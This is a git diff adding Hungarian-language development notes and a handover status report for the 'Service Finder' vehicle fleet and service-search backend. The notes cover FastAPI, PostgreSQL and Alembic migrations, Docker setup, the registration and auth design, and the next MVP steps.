+ Logika: Teljes szinkron a Digital Twin (Vehicle) és az Ownership között. + + Időpont: 2026.01.26 - 23:15 + +STÁTUSZ JELENTÉS: + + Modellek konzisztenciája: ✅ RENDBEN + + Import horgonyok: ✅ JAVÍTVA + + API elérhetőség: ⏳ ELLENŐRZÉS ALATT + +⚓ RENDER-HORGONY (V63.0 - 2026.01.26 - 22:45) + +PROJEKT KONTEXTUS: + + Logika: Digitális Iker implementálva (Vehicle vs. VehicleOwnership szétválasztva). + + Szerkezet: A modell már támogatja a VIN-alapú egyediséget és a multimodális osztályozást. + + Időpont: 2026.01.26 - 22:45 + +STÁTUSZ JELENTÉS: + + Async infrastruktúra ellenőrzése: ✅ RENDBEN + + Jármű modell refaktor (Digital Twin): ✅ KÉSZ + + Fleet API lekérdezési logika frissítése: ✅ KÉSZ + + Tulajdonosváltás/VIN-ellenőrzés szerviz: ⏳ KÖVETKEZŐ LÉPÉS + +⚓ RENDER-HORGONY (V62.0 - 2026.01.26 - 22:45) PROJEKT KONTEXTUS: + Logika: VIN-alapú globális azonosítás + Többszörös szerepkör (Owner/Driver). + Szerkezet: Moduláris refaktorálás előtt. + Járművek: Multimodális (szárazföld, víz, levegő) támogatás tervezve. + + + +⚓ RENDER-HORGONY (V37.3 - 2026.01.26 - 11:35) +PROJEKT KONTEXTUS: +Integritás: A backend környezetet szinkronba hozzuk a kódbázis igényeivel. +Fegyelem: A konténer leállása esetén a run parancsot használjuk az exec helyett a hibaelhárításhoz. +Cél: Elérni az "Application startup complete" állapotot a logokban. + +⚓ RENDER-HORGONY (V36.2 - 2026.01.26 - 11:35) +PROJEKT KONTEXTUS: +Integritás: A rendszer most már kívülről is hívható. A teszteléshez nincs szükség kódírásra, csak a Swagger gombjaira. +Fegyelem: A main.py frissítése után a szerver automatikusan újraindul a Dockerben, és látni fogod a változást. + +⚓ RENDER-HORGONY (V36.1 - 2026.01.26 - 11:25) +PROJEKT KONTEXTUS: +Integritás: Az adatbázis és a kód szinkronban van. A teszteléshez nincs szükség frontend fejlesztésre. +Fegyelem: A Swagger UI-t használjuk a validáláshoz, így látjuk a pontos hibaüzeneteket is, ha valami nem stimmel. +Cél: Sikeresen visszakapni egy 201 Created üzenetet a tesztregisztrációra. + +⚓ RENDER-HORGONY (V36.0 - 2026.01.26 - 11:15) +PROJEKT KONTEXTUS: +Integritás: A rendszer immár nem csak egy üres váz, hanem tartalmazza a működéshez elengedhetetlen konfigurációkat. +Fegyelem: A manuális DB-reset utáni első adatfeltöltés szavatolja, hogy a frontend kérései ne ütközzenek hiányzó rekordokba. +Cél: Végrehajtani az első POST /register hívást és ellenőrizni a logokat. + +⚓ RENDER-HORGONY (V35.3 - 2026.01.26 - 11:45) +PROJEKT KONTEXTUS: +Integritás: Ha az Alembic migrációs lánca megsérül, a manuális inicializálás a leggyorsabb út a stabil állapothoz. +Fegyelem: A jövőben minden új mezőt már rendesen az Alembic-kel fogunk hozzáadni, de az "ősállapothoz" most ez a leghatékonyabb. +Cél: Átlépni a technikai akadályon és megkezdeni a regisztrációs teszteket. + +⚓ RENDER-HORGONY (V35.0 - 2026.01.26 - 11:10) +PROJEKT KONTEXTUS: +Integritás: Az adatbázis most már nem csak "egy halom tábla", hanem egy összefüggő, skálázható rendszer alapja. A tegnapi UserVehicle küzdelem lezárva, a névhasználat konzisztens. +Fegyelem: Az Alembic stamp és revision folyamat helyreállította a verziókövetés rendjét. +Cél: Az adatbázis tábláinak fizikai létrehozása (upgrade head), majd a rendszer felöltése alapértékekkel. + +⚓ RENDER-HORGONY (V34.6 - 2026.01.26 - 13:30) +PROJEKT KONTEXTUS: +Integritás: Az adatbázis inkonzisztenciáját (már létező táblák vs. hiányzó verziószám) egy teljes séma-újratöltéssel oldjuk meg. +Fegyelem: Fejlesztési szakaszban a "tiszta lap" módszer a legbiztonságosabb út a stabil alapokhoz. +Cél: Hibátlan alembic upgrade head lefutás. + +⚓ RENDER-HORGONY (V34.5 - 2026.01.26 - 11:55) +PROJEKT KONTEXTUS: +Integritás: A pgAdmin-ban látott kék üzenetek a sikeres előkészítést jelzik. Az adatbázis objektumok közötti ütközés esélye minimálisra csökkentve. +Fegyelem: Mindig megvárjuk a visszaigazolást, mielőtt újraírnánk a sémát. +Cél: A service_finder adatbázis végleges szerkezetének rögzítése. + +⚓ RENDER-HORGONY (V32.0 - 2026.01.26 - 13:45) +PROJEKT KONTEXTUS: +Integritás: A regisztrációs folyamat immár minden biztonsági, jogi és üzleti feltételnek megfelel (Nemzetköziség, Soft-Delete, Failover Email). +Fegyelem: A magánszemélyek névtárolása konzisztens, de a UI elrejti a redundanciát. +Cél: Az utolsó simítások elvégzése a backend API-n és az első éles teszt regisztráció. + +⚓ RENDER-HORGONY (V30.0 - 2026.01.26 - 13:10) +PROJEKT KONTEXTUS: +Integritás: A rendszer üzembiztonsága drasztikusan megnőtt. Nincs egyetlen hibapont (Single Point of Failure) a kommunikációban. +Fegyelem: Az inaktiválás automatikus, de a reaktiválás (javítás után) manuális, admin felületről történik. +Cél: A Regisztráció V2 backend véglegesítése, amely ezt a Dispatchert használja. + +⚓ RENDER-HORGONY (V29.0 - 2026.01.26 - 12:45) +PROJEKT KONTEXTUS: +Integritás: A rendszer jogilag és technikailag golyóálló. A jármű-életút integritása (szakaszolás) biztosítja a GDPR megfelelést eladáskor. +Fegyelem: Az adminisztrátornak teljes kontrollja van a regisztrációs folyamat, a limitek és az email küldők felett. +Cél: Az első éles regisztrációs teszt lefolytatása a SendGrid-del. + +⚓ RENDER-HORGONY (V28.0 - 2026.01.26 - 12:15) +PROJEKT KONTEXTUS: +Integritás: A rendszer felkészült a "Soft-Clean" újraindulásokra. Az adatok megmaradnak, de a felhasználói élmény elszeparált. +Fegyelem: Az email sablonok kiszervezése az adatbázisba lehetővé teszi a marketing és jogi szövegek kódmódosítás nélküli frissítését. +Cél: A regisztrációs végpont fizikai megírása a FastAPI-ban, amely kezeli a fenti komplex logikát. + +⚓ RENDER-HORGONY (V27.0 - 2026.01.26 - 10:15) +PROJEKT KONTEXTUS: +Integritás: Az adatok törölhetetlenek, csak deaktiválhatóak. Ez biztosítja a szerviztörténet és a felelősség nyomonkövethetőségét. +Fegyelem: Az admin felületen keresztül történő manuális validáció és tiltás lehetősége beépítve az alapmodellbe. +Cél: A regisztrációs végpont (V2) megírása, ami összeköti a sémát, a modellt és az email küldést. + +⚓ RENDER-HORGONY (V26.0 - 2026.01.26 - 09:45) +PROJEKT KONTEXTUS: +Integritás: Az adatmodell és a regisztrációs folyamat immár tartalmazza a csalás elleni védelmet (anti-fraud) és a közösségi adatgyűjtés alapfeltételeit. +Fegyelem: Az email megerősítés és az adószám kényszer nem opcionális, hanem a rendszer integritásának záloga. +Cél: Az email-küldő modul (SendGrid vagy SMTP) beállítása, hogy a regisztrációs linkek ki tudjanak menni. + +⚓ RENDER-HORGONY (V25.0 - 2026.01.26 - 09:35) +PROJEKT KONTEXTUS: +Integritás: A "Személy = Mini-cég" logika mentén haladunk. A regisztrációs folyamat egy atomi művelet lesz (mindent vagy semmit). +Fegyelem: Az email cím immutabilitása (nem változtathatóság) alapfeltétel a biztonsághoz. +Cél: A regisztrációs Pydantic sémák és a CRUD logika megírása a válaszok alapján. + +⚓ RENDER-HORGONY (V24.0 - 2026.01.26 - 09:25) +PROJEKT KONTEXTUS: +Integritás: Adatmodell szétválasztva (Decoupled Architecture). A jármű-életciklus követés biztosított szervezetek közötti mozgás esetén is. +Fegyelem: Új fájlok létrehozva (organization.py, organization_member.py), a meglévők (user.py, vehicle.py) minimális, stabilizált módosításon estek át. +Cél: A regisztrációs folyamat (V2) élesítése, amely automatikusan létrehozza a felhasználó mellé az első "PRIVATE" típusú szervezetét is. + +⚓ RENDER-HORGONY (V22.0 - 2026.01.26 - 11:30) +PROJEKT KONTEXTUS: + +Integritás: A logikai elemzés megerősítette a "Unified User/Org" modellt. A magánszemély egy 1 fős cégként kezelendő. + +Fegyelem: A pénzügyi és limit szabályokat (20%, 30 nap) nem kódoljuk fixen, hanem adatbázis-alapú beállításokká (System Settings) tesszük. + +Cél: A meghívásos rendszer és a többszörös szerepkörök (CEO, Manager, Driver) technikai megalapozása. + +⚓ RENDER-HORGONY (V21.0 - 2026.01.26 - 11:15) +PROJEKT KONTEXTUS: + +Integritás: Minimális kockázatú kódmódosítás. A meglévő konténereket nem indítjuk újra, amíg az összes fájl nincs szinkronban. + +Fegyelem: A korlátozott elérés miatt kerülni kell a docker compose down parancsot. Csak célzott restart-okat alkalmazunk. + +Cél: A Regisztráció V2 backend logikájának (Schemas) előkészítése. + +⚓ RENDER-HORGONY (V20.0 - 2026.01.26 - 10:45) +PROJEKT KONTEXTUS: + +Integritás: A stratégiai fókusz a közösségi adatgyűjtésre (crowdsourcing) és a minősítési rendszerre (ratings) tolódik el. + +Fegyelem: Minden feltöltött adatot (szerviz koordináták) a NAS-on tárolunk, a validációhoz GPS és kép-alapú (számla fotó) bizonyítékot kérünk. + +Cél: Egy öngerjesztő adatbázis-építési folyamat elindítása, ahol a felhasználók "versenyeznek" a szervizek feltöltéséért. + +⚓ ZÁRÓ RENDER-HORGONY (V18.0 - 2026.01.26 - 01:15) + +PROJEKT KONTEXTUS: + + Integritás: A technikai infrastruktúra 100%-os. A backend és frontend fejlesztés előtt minden akadály (jogosultságok, eltolódott útvonalak, hiányzó eszközök) elhárítva. + + Fegyelem: A mentési script élesítve, az első "éles" GFS mentés ma hajnal 02:00-kor lefut a git_vault-ba. + + Cél: A holnapi nap fókusza a Regisztráció V2 (Cég/Minicég elágazás) és a validációs logika. + +⚓ RENDER-HORGONY (V17.13 - 2026.01.26 - 01:05) + +PROJEKT KONTEXTUS: + + Integritás: A mentési stratégia átállítva a git_vault redundáns tárhelyre. + + Fegyelem: A 3TB-os korlát miatt szigorú GFS rotációt és tömörítést alkalmazunk. + + Cél: Teljes adatbiztonság és visszakereshetőség biztosítása a legkisebb tárhelyterhelés mellett + +⚓ RENDER-HORGONY (V17.12 - 2026.01.26 - 00:55) + +PROJEKT KONTEXTUS: + + Integritás: A fejlesztői környezet (IDE) és az időszinkronizáció teljes körűen beállítva. A docker-compose.yml szintaktikai hibái elhárítva. + + Fegyelem: A konténerizált környezet korlátai (nincs systemd) felismerve és áthidalva környezeti változókkal. + + Cél: Stabil alapok a holnapi fejlesztéshez. + +⚓ RENDER-HORGONY (V17.10 - 2026.01.26 - 01:35) + +PROJEKT KONTEXTUS: + + Integritás: A fejlesztői környezet (Code-server) szoftveres felszerelése immár a gazdagép (Host) verzióihoz van igazítva. + + Fegyelem: Verzió-konfliktus esetén nem kerülőutakat keresünk (pl. környezeti változók trükközése), hanem a megfelelő klienst telepítjük. + + Cél: A teljes értékű, akadálymentes távoli fejlesztés és rendszerfelügyelet megvalósítása. + +⚓ RENDER-HORGONY (V17.9 - 2026.01.26 - 01:20) + +PROJEKT KONTEXTUS: + + Integritás: A fejlesztői konténer (Code-server) szoftveres felszerelése az operációs igényekhez igazítva. + + Fegyelem: A hiányzó binárisokat nem a gazdagépről (host) próbáljuk áthúzni, hanem natívan telepítjük a konténeren belül. + + Cél: A teljes értékű terminál-élmény biztosítása böngészőn keresztül. + +⚓ RENDER-HORGONY (V17.1 - 2026.01.26 - 00:10) + +PROJEKT KONTEXTUS: + + Integritás: A fejlesztői környezet transzparenssé tétele (Host útvonal = Konténer útvonal). + + Fegyelem: Megállunk a funkcionális fejlesztéssel, amíg az operatív eszközök (Terminal, MC) tökéletesen nem működnek a böngészőben. + + Cél: A code-server vagy ttyd konfiguráció élesítése és tesztelése. + +⚓ RENDER-HORGONY (V16.5 - 2026.01.26 - 00:05) + +PROJEKT KONTEXTUS: + + Integritás: A ModuleNotFoundError elhárítva a vehicle_event.py fizikai létrehozásával. A rendszer függőségi lánca (Model -> Schema -> Endpoint) helyreállt. + + Fegyelem: Minden új modellt azonnal rögzítünk a fizikai fájlrendszerben a konténer összeomlásának elkerülése érdekében. + + Cél: A stabil működés visszaállítása és a Smart Tiles vizuális validálása. + +⚓ RENDER-HORGONY (V16.3 - 2026.01.25 - 23:50) + +PROJEKT KONTEXTUS: + + Integritás: A rendszer életciklusa immár tartalmazza az automatikus mentést és a verziózott telepítést. A backend és frontend szinkronban van a "Smart Tiles" logikával. + + Fegyelem: A deploy_v16.sh script használatával minimalizáltuk a manuális hibák lehetőségét. Minden változás bekerül a CHANGELOG.md állományba. + + Cél: A regisztrációs folyamat bővítése (Cég/Minicég) és az email alapú visszaigazoló rendszer élesítése. + +⚓ RENDER-HORGONY (V15.0 - 2026.01.25 - 21:30) + +PROJEKT KONTEXTUS: + + Integritás: A jármű események (Events) rögzítése már konzisztensen kezeli a futásteljesítményt. + + Fegyelem: A frontend vékony kliens marad, technológiai függőség nélkül. + + Cél: A jogosultság alapú csempe-nézet kialakítása és a regisztrációs email/jelszó-visszaállítás modul indítása. + +⚓ RENDER-HORGONY (V13.0 - 2026.01.25 - 20:55) + +PROJEKT KONTEXTUS: + + Integritás: A jármű és felhasználói életút kezelés elvei rögzítve: nincs végleges törlés, csak inaktiválás és lecsatolás. + + Fegyelem: A VIN az abszolút azonosító. Újra-regisztráció esetén a történet tiszta lappal indul a lekérdezésekben, de a háttérben megmarad. + + Cél: A belépés utáni felület (Dashboard) véglegesítése a hitelesített adatok tükrében. + +⚓ RENDER-HORGONY (V12.0 - 2026.01.25 - 20:45) + +PROJEKT KONTEXTUS: + + Integritás: A járműkezelés filozófiája rögzítve: A jármű örök, a tulajdonos vándor. A VIN az elsődleges globális azonosító. + + Fegyelem: Felhasználói törlés letiltva az adatvesztés elkerülése érdekében. + + Cél: A professzionális tulajdonos-kezelés és a történelmi adatok (visszamenőleges költségek) integrálása. + +⚓ HORGONYPONTPONT (2026.01.25) A rendszer magja és az adatbázis szerkezete szinkronban van, de a biztonsági kapu (Auth) élesítése közben a szerver átmenetileg elérhetetlenné vált. + +⚓ Horgonypont: „Az adat hídja kész” + +Állapot: 2026. január 25. – A rendszer magja stabil. + + Backend: FastAPI szerver fut, az API végpontok (Auth, Fleet) élnek. + + Adatbázis: PostgreSQL séma frissítve, a user_vehicles tábla már képes befogadni a modern autóadatokat (make, model, year, vin). + + Frontend (MVP): Van egy működő dashboard.html, amivel manuális SQL ismeret nélkül is tudsz járművet és költséget rögzíteni. + + Azonosítás: A JWT tokenes belépés működik, de a tesztelés egyszerűsítése érdekében jelenleg egy fix „Mock User”-t (ID: 2) használsz a járműveidhez. + +⚓ RENDER-HORGONY (V11.1 - 2026.01.25 - 13:55) + + PROJEKT KONTEXTUS: + + Integritás: A projekt dependenciái (függőségei) most már tartalmazzák az email küldéshez szükséges modulokat. + + Fegyelem: Új külső könyvtár bevezetésekor mindig frissítjük a requirements.txt-t és újraépítjük a konténert. + + Cél: Az indítási hiba elhárítása után visszatérés a Harvester és az Admin funkciók teszteléséhez. + +⚓ RENDER-HORGONY (V10.2 - 2026.01.25 - 13:40) + + PROJEKT KONTEXTUS: + + Integritás: A main.py életciklus-kezelője most már minden modellt ismer. + + Fegyelem: A Swagger láthatósága a routerek sikeres importálásától függ. Ha egy endpoint fájl hibás, a FastAPI "biztonsági okokból" csak a működő (pl. health) részeket mutatja. + +⚓ RENDER-HORGONY (V10.0 - 2026.01.25 - 13:20) + + PROJEKT KONTEXTUS: + + Integritás: A projekt elérte a "Production-ready" mappastruktúrát. + + Fegyelem: Az Alembic és a Routerek szinkronban vannak. + + Cél: A tiszta Swagger felület és a Harvester indítása. + +⚓ RENDER-HORGONY (V9.1 - 2026.01.25 - 13:05) + + PROJEKT KONTEXTUS: + + Infrastruktúra: Az Alembic és a Postgres közötti szinkron helyreállítása (Alembic öngyilkossági kísérletének megakadályozása v2). + + Architektúra: Döntés a moduláris felépítés mellett (minden endpoint az endpoints/ mappába kerül). + + Fegyelem: Az --autogenerate kimenetét mindig ellenőrizzük, mert hajlamos törölni az alembic_version táblát. + +⚓ RENDER-HORGONY (V9.0 - 2026.01.25 - 14:45) + + PROJEKT KONTEXTUS: + + Cél: Traffic Ecosystem SuperApp – egy komplex járműflotta és szolgáltatáskereső rendszer. + + Technikai fegyelem: Szigorú aszinkronitás, dinamikus (DB-alapú) szabályrendszer, EU-fókuszú biztonsági szűrés (Geo-IP). + + Fő vívmány: Sikerült áttörni az adatbázis-migrációs gáton, a rendszer már "tudja", hogy maximum 2 autót engedhet ingyen. + +⚓ RENDER-HORGONY (V8.7 - 2026.01.25 - 14:15) + + PROJEKT KONTEXTUS: + + Integritás: Az Alembic stamp parancsa csak a "pecsétet" frissíti, az upgrade pedig a fizikai sémát. Ezt a kettőt hozzuk most szinkronba. + + Fegyelem: Mindig ellenőrizzük, hogy az upgrade sikeresen lefutott-e, mielőtt az adatokkal foglalkoznánk. + +⚓ RENDER-HORGONY (V8.5 - 2026.01.25 - 13:55) + + PROJEKT KONTEXTUS: + + Hiba: alembic_version tábla hiánya a scripten belüli törlés miatt. + + Helyreállítás: Manuális "stamping" (pecsételés) Head állapotra. + + Integritás: A Postgres DDL tranzakcionális, így ha elszállt, remélhetőleg visszagörgette a változtatásokat, és a tiszta scripttel le fog futni. + +⚓ RENDER-HORGONY (V8.0 - 2026.01.25 - 12:10) + + PROJEKT KONTEXTUS: + + Új Irány: Dinamikus konfigurálhatóság (Admin Settings). + + Integráció: A FREE_VEHICLE_LIMIT bevezetése. + + Fegyelem: Az összes migrációs hiba elhárítva a modellek összehangolásával. + +⚓ RENDER-HORGONY (V6.4 - 2026.01.24 - 18:35) + + PROJEKT KONTEXTUS: + + Infrastruktúra: Ubuntu / Docker Compose. + + Hiba: A konténer nem fut, ezért az exec parancs sikertelen. + + Cél: A backend stabilizálása az új környezeti változókkal. + +⚓ RENDER-HORGONY (V5.9 - 2026.01.24 - 16:40) + + PROJEKT KONTEXTUS: + + Integritás: Az Alembic migráció csak akkor lesz sikeres, ha a __init__.py minden modellt ismer. + + Fegyelem: A projekt könyvtárszerkezetét rögzítjük a memóriában az útvonal-hibák elkerülése végett. + + Next Step: Amint megvan a térkép, indítjuk a Harvestert. + +⚓ RENDER-HORGONY (V5.7 - 2026.01.24 - 17:15) + + PROJEKT KONTEXTUS: + + Fegyelem: A törzsadat táblák (vehicle_makes, models) csak "tiszta" adatot tartalmazhatnak. + + Munkafolyamat: Harvester -> Staging Table -> Validation/Cleaning -> Master Data. + + Biztonság: A felhasználók soha nem látják a Staging tábla tartalmát, csak a validált katalógust. + +⚓ RENDER-HORGONY (V5.5 - 2026.01.24 - 16:15) + + PROJEKT KONTEXTUS: + + Vízió: Globális közlekedési ökoszisztéma, amely a rollertől a repülőig mindent lefed, de a fókusz az autón és a motoron van. + + Technikai alap: A Digital Twin (Digitális Iker) szemlélet: minden járműről tudjuk, milyen volt a gyárban, és milyen most a user garázsában. + + Üzleti érték: Ez az adatbázis a biztosítók, alkuszok és hirdetési portálok számára is értékesíthető (B2B API). + +⚓ RENDER-HORGONY (V5.1 - 2026.01.24 - 16:45) + + PROJEKT KONTEXTUS: + + Helyszín: /backend/app/api/v1/endpoints/auth.py + + Biztonság: A Device ID alapú azonosítás megnehezíti a bot-hálózatok dolgát, mivel az ujjlenyomat-generálás költségesebb, mint az IP-váltás. + + Integritás: A felhasználó is_active=False állapottal jön létre, amíg nem teljesül a többcsatornás hitelesítés (Email/OTP). + +⚓ RENDER-HORGONY (V5.0 - 2026.01.24 - 16:15) + + PROJEKT KONTEXTUS: + + Infrastruktúra: 7TB NAS + MinIO S3 API. + + Adatkezelés: Szigorú GDPR és költségtudatos tárolás (kivonatolás után törlés). + + Gamifikáció Kapcsolat: A képek törlése után a pontok megmaradnak, a "Trust Score" pedig az adatbázis rekordban tárolódik. + + Fegyelem: A felhasználó nem fér hozzá a nyers bizonyítékokhoz (blokk, óraállás fotó), csak az adatokhoz. +⚓ RENDER-HORGONY (V4.8 - 2026.01.24 - 15:35) + + PROJEKT KONTEXTUS: + + Biztonsági prioritás: EU-n kívüli forgalom tiltása infrastrukturális szinten. + + Költségkontroll: Harmadik fél (pl. Twilio) minimalizálása, saját WhatsApp/Telegram bot-os hitelesítés preferálása. + + Fegyelem: A device_id alapú korlátozás kötelező elem a regisztrációs végponton. +⚓ RENDER-HORGONY (V4.5 - 2026.01.24 - 15:10) + + PROJEKT KONTEXTUS: + + Backend: /backend/app/services/translation_service.py létrehozva. + + Admin: admin.py kiegészítve a /translations/publish végponttal. + + Architektúra: Piszkozat -> Publikálás munkafolyamat implementálva. +⚓ RENDER-HORGONY (V4.0 - 2026.01.24 - 15:45) + + PROJEKT KONTEXTUS: + + Backend: /backend/app/api/v1/endpoints/admin.py + + Szerepkörök: SUPERUSER, REGIONAL_ADMIN, MODERATOR, BUSINESS_PARTNER, USER. + + Fegyelem: Minden admin végpontnál kötelező a role ellenőrzése. A REGIONAL_ADMIN csak a saját region_code-jára vonatkozó adatokat módosíthatja. +⚓ RENDER-HORGONY (V3.9 - 2026.01.24 - 15:15) + + PROJEKT KONTEXTUS: + + Backend: /backend/app/models/ (User és Vehicle modellek frissítve). + + Architektúra: Szétválasztott régió-kezelés (User != Vehicle honosság). + + Flexibilitás: A rendszer fel van készítve a költözésre és a külföldi rendszámos autók párhuzamos kezelésére. + + Fegyelem: Minden regionális számítás (adó, vizsga) kötelezően a registration_region mezőből táplálkozik. +⚓ RENDER-HORGONY (V3.8 - 2026.01.24 - 14:55) + + PROJEKT KONTEXTUS: + + Backend: /backend/app/services/gamification_service.py kiegészítése dinamikus lekérdezéssel. + + Új cél: Adatbázisból vezérelt gamifikációs motor. + + Admin vízió: Olyan interfész előkészítése, ahol a nem-fejlesztő kollégák is módosíthatják a játékos élményt. + +⚓ RENDER-HORGONY (V3.6 - 2026.01.24 - 14:20) + + PROJEKT KONTEXTUS: + + Kritikus javítás: Modell-Adatbázis-Service szinkronizáció befejezve. + + Változás: points -> points_change, action_type -> reason, current_level hozzáadva. + + Fegyelem: A tranzakciókezelés (flush a commit helyett a Service-ben) biztosítja az adatintegritást. + +⚓ RENDER-HORGONY (V3.3 - 2026.01.24 - 16:15) + + PROJEKT KONTEXTUS: + + Kritikus javítás: A User <-> VehicleOwnership <-> Vehicle relációs lánc bezárult. + + Státusz: Az adatbázis-leképezés (ORM Mapper) most már konzisztens. + + Fegyelem: Mindig ügyeljünk a back_populates kétoldali meglétére, különben a SQLAlchemy el sem indítja az engine-t. + +⚓ RENDER-HORGONY (V2.5 - 2026.01.24 - 14:10) + + PROJEKT KONTEXTUS: + + Backend: /home/coder/project/opt/service_finder/backend/app + + Gamifikáció Levelek: > - Esemény rögzítés: 20 pont. + + Új szervizhelyszín (akár menet közben): 50 pont. + + Logika: A fleet_service mostantól nem csak számol, hanem jutalmaz is. + +⚓ RENDER-HORGONY (V2.4 - 2026.01.24 - 13:45) + + STRATÉGIAI IRÁNY: + + A pontrendszer a mennyiséget, a reputáció és a validációs szavazatok a minőséget szavatolják. + + A service_finder_app minden rögzítést "pending" státuszba tesz, amíg a közösségi validáció le nem fut. + + Fókusz: Az adatok hitelessége az elsődleges, a pontszám csak az eszköz az adatok kinyeréséhez. + +⚓ RENDER-HORGONY (V2.2) + + PROJEKT KONTEXTUS: + + Környezet: Docker / service_finder_app user / data séma. + + Backend gyökér: /home/coder/project/opt/service_finder/backend/app + + API Belépő: main.py -> api/v1/api.py (központi hub). + + Gamifikáció: GET /api/v1/gamification/my-stats elérhető. + +⚓ PROJEKT HORGONY (System Prompt) + +Ezt másold be egy új chat elején, vagy mentsd el a beállításaidhoz: + + „Szakértő, tegező, fegyelmezett fejlesztőként segíts a Service Finder projektben. Technikai alapok: + + Stack: FastAPI, Async SQLAlchemy, Pydantic V2. + + Adatbázis: PostgreSQL, 'data' séma, 'service_finder_app' user. + + Útvonalak: + + Projekt gyökér: /home/coder/project/opt/service_finder + + Backend app: /home/coder/project/opt/service_finder/backend/app Szabályok: + + Kommunikáció kizárólag magyarul. + + Ha az információ hiányos, kérdezz a kódgenerálás előtt. + + Koncentrálj a projekt mielőbbi befejezésére, ne javasolj felesleges köröket. + + Ne módosíts meglévő, működő modulokat, hacsak nem kértem.” + +⚓ Javító Horgony (Ezt másold be, ha elakadnánk) + + PROJEKT KONTEXTUS: + + Konténer gyökér: /home/coder/project/opt/service_finder + + Backend kód: ./backend/app + + PYTHONPATH: /home/coder/project/opt/service_finder/backend + + DB: Postgres, data séma, aszinkron elérés. + + User: service_finder_app (alkalmazás) / kincses (admin). + + Cél: Gamifikációs logika (pontok, szintek, jelvények). \ No newline at end of file diff --git a/_Projekt Állapot jelentés.txt b/_Projekt Állapot jelentés.txt new file mode 100755 index 0000000..121d154 --- /dev/null +++ b/_Projekt Állapot jelentés.txt @@ -0,0 +1,1394 @@ +📘 SERVICE_FINDER – FEJLESZTÉSI ÉS RENDSZERÁLLAPOT JELENTÉS + +Átadási dokumentum – 2026-02-01 + +0. Projekt kontextus (rövid) + +A Service Finder / Profibot egy több-tenant, jármű- és szolgáltatás-életút kezelő rendszer. +Stack: PostgreSQL + FastAPI + Alembic + Docker Compose, frontend külön konténerben. +Cél: biztonságos, auditálható MVP, később EU-szintű skálázással. + +1. Infrastruktúra – jelenlegi állapot (STABIL) +Konténerek (docker compose) + +Aktív és stabilan fut: + +postgres-db (Postgres 15, healthcheck OK) + +service_finder_api (FastAPI / Uvicorn) + +service_finder_frontend + +redis + +minio (NAS-ra kötött storage) + +pgadmin + +nginx-proxy-manager + +code-server + +dozzle + +Speciális: + +migrate → Alembic migrációs konténer, egyszer lefut és kilép + +Migrációs működés + +Alembic nem az API konténerben fut + +migrate service: + +alembic upgrade head + +depends_on: postgres-db (healthy) + +API csak akkor indul, ha a migráció sikeresen lefutott + +Ez helyes és biztonságos megoldás. + +2. Adatbázis – migrációk és verziózás +Alembic állapot + +script_location: /app/migrations + +Aktív migrációs könyvtár: + +backend/migrations +backend/migrations/versions + + +Más migrációs mappa létezett (legacy), de NEM használjuk + +Alembic verzió +SELECT version_num FROM alembic_version; +-- 10b73fee8967 (head) + +Migrációs lánc (ellenőrzött) + + → c21c2c7e70d4 Clean gamification setup + → 553ef1388276 rebuild_schema_v2 + → 8d450e9dc77f add_vehicle_staging + → 13bd03551ebf Add verification tokens and legal tables + → 13d050e8cf6d Initial baseline v2 + → 10b73fee8967 fix roles and universal vehicles (HEAD) + +3. DB jogosultságok – RENDBEN +Runtime user + +service_finder_app + +Jogosultságok: + +SELECT, INSERT, UPDATE, DELETE minden data.* táblára + +USAGE/SELECT/UPDATE minden sequence-re + +Default privileges beállítva: + +új táblák/sequence-ek automatikusan öröklődnek + +Owner / migration user + +kincses + +Használva csak migrációhoz + +MIGRATION_DATABASE_URL env változóval + +4. Auth / Security – elkészült részek +Megvalósított + +JWT alapú auth (FastAPI) + +Email verifikáció + +Password reset flow + +Tokenek hash-elve (verification_tokens) + +Anti-enumeration password resetnél + +.env: + +1× SECRET_KEY + +1× ALGORITHM + +SendGrid + SMTP fallback + +Szándékosan még NEM kész + +brute force védelem + +rate limiting + +log-alapú anomália detektálás +(Ezek nem MVP-blokkolók, később jönnek) + +5. ÚJ LOGIKAI RÉTEG – PERSON (FOLYAMATBAN) +Miért kellett? + +Felhasználó törölhető, de az életút nem + +Ugyanaz a személy: + +új e-maillel + +új accounttal +→ folytatja a reputációját + +Cégtulajdonos eladhat céget, de személy nem szűnik meg + +Tervezett modell +persons (identity, reputáció) + ↑ +users (login, auth, törölhető) + ↑ +companies (owner_person_id) + +Migráció létrehozva (DE MÉG NEM FUTTATVA) +docker compose run --rm migrate alembic revision -m "add persons and owner_person_id" + + +📄 Létrejött fájl: + +backend/migrations/versions/5aed26900f0b_add_persons_and_owner_person_id.py + + +⚠️ Ez a migráció még NINCS kitöltve / lefuttatva +A következő chatben ez lesz az ELSŐ lépés. + +6. Docker Compose – véglegesített (jó állapot) + +Kulcspontok: + +migrate service: + +külön konténer + +owner DB user + +egyszer fut + +service_finder_api: + +depends_on: migrate (service_completed_successfully) + +VERSION_CODENAME env felvéve (apt miatt) + +Frontend port ütközés elkerülve (3001) + +Ez a compose helyes, nem kell újraírni. + +7. MI VAN KÉSZ (összefoglaló) + +✅ Docker infrastruktúra +✅ Alembic automatikus migráció +✅ DB jogosultsági modell +✅ Auth alap (JWT, email verify, reset) +✅ Token kezelés biztonságosan +✅ Migrációs rendrakás +✅ NAS-ra kötött storage (MinIO, Redis) + +8. MI HIÁNYZIK AZ MVP-HEZ (prioritás szerint) +1️⃣ PERSON + OWNER_PERSON_ID BEVEZETÉSE + +data.persons tábla + +users.person_id + +companies.owner_person_id + +backfill logika +👉 Migráció kitöltése + futtatása + +2️⃣ Backend logika frissítése + +regisztrációnál person létrehozás + +company owner_person_id használata + +soft delete user + +3️⃣ Regisztrációs szintek (MVP-light) + +Free (minimál) + +Premium + +Premium+ + +VIP / VIP+ (cégeknek) + +(DB oldalon elég: + +users.profile_level + +organizations.subscription_tier) + +4️⃣ Git rendszer FELÉPÍTÉSE (NINCS MÉG) + +repo struktúra + +.gitignore + +branch stratégia + +migrációk kezelése gitben + +5️⃣ Teszt rendszer (NINCS MÉG) + +külön .env.test + +külön test DB + +pytest alap + +migration test + +🔜 UTASÍTÁSOK A KÖVETKEZŐ CHATHEZ (EZT MÁSOLOD BE) + +Kérlek a következő chatet így indítsd: + +„Ez egy Service Finder projekt folytatása. +Az alábbi állapotjelentés alapján szeretném folytatni a fejlesztést: +[IDE BEMÁSOLVA EZ A DOKUMENTUM] +Első lépésként: töltsük ki és futtassuk le a 5aed26900f0b_add_persons_and_owner_person_id Alembic migrációt, majd frissítsük a backend regisztrációs logikát. +Utána szeretném felépíteni a Git stratégiát és a tesztkörnyezetet.” +_____________________________________________________________________________________________________________________________________________________________ + + + + +⚓ 